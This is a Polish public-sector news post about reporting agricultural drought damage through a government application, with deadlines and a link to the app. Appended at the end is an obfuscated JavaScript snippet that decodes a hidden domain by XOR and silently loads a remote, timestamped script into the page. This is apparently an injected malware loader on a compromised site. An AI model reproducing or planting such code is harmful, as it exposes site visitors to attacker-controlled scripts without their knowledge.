Aktualności

Komunikat suszowy!

wrz 8, 2023 | Aktualności

Uprzejmie informujemy, że na podstawie Rozporządzenia Rady Ministrów z dnia 13 lipca zmieniającego rozporządzenie w sprawie szczegółowego zakresu i sposobów realizacji niektórych zadań Agencji Restrukturyzacji i Modernizacji Rolnictwa( Dz. U. z 2023 r. poz. 1350) podstawą oszacowania szkód spowodowanych suszą w gospodarstwie rolnym (wzorem lat ubiegłych) jest złożenie wniosku przez poszkodowanego producenta rolnego za pomocą publicznej aplikacji – „zgłoś suszę rolniczą”. Złożenie ww. wniosku w terminie do 15 października roku wystąpienia suszy jest konieczne do uzyskania w późniejszym czasie protokołu lub kalkulacji strat wygenerowanych automatycznie przez tą aplikację.

Rolnik może także zgłosić wystąpienie szkód Komisji do szacowania szkód w gminie, powołanej przez wojewodę, w terminie umożliwiającym ich oszacowanie, nie później niż do czasu zbioru plonu głównego danej uprawy, nie później niż do dnia 15 września roku wystąpienia szkody.

Dla zachowania prawidłowej nazwy upraw i jej powierzchni sugeruje się do wniosku zgłoszeniowego załączyć kopię wniosku o przyznanie płatności w rozumieniu przepisów o płatnościach w ramach systemów wsparcia bezpośredniego. Każda działka musi być wpisana oddzielnie, przy czym wpisujemy tylko działki, na których wystąpiły szkody.

Link do aplikacji:

https://aplikacje.gov.pl/app/susza/#/campaign

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);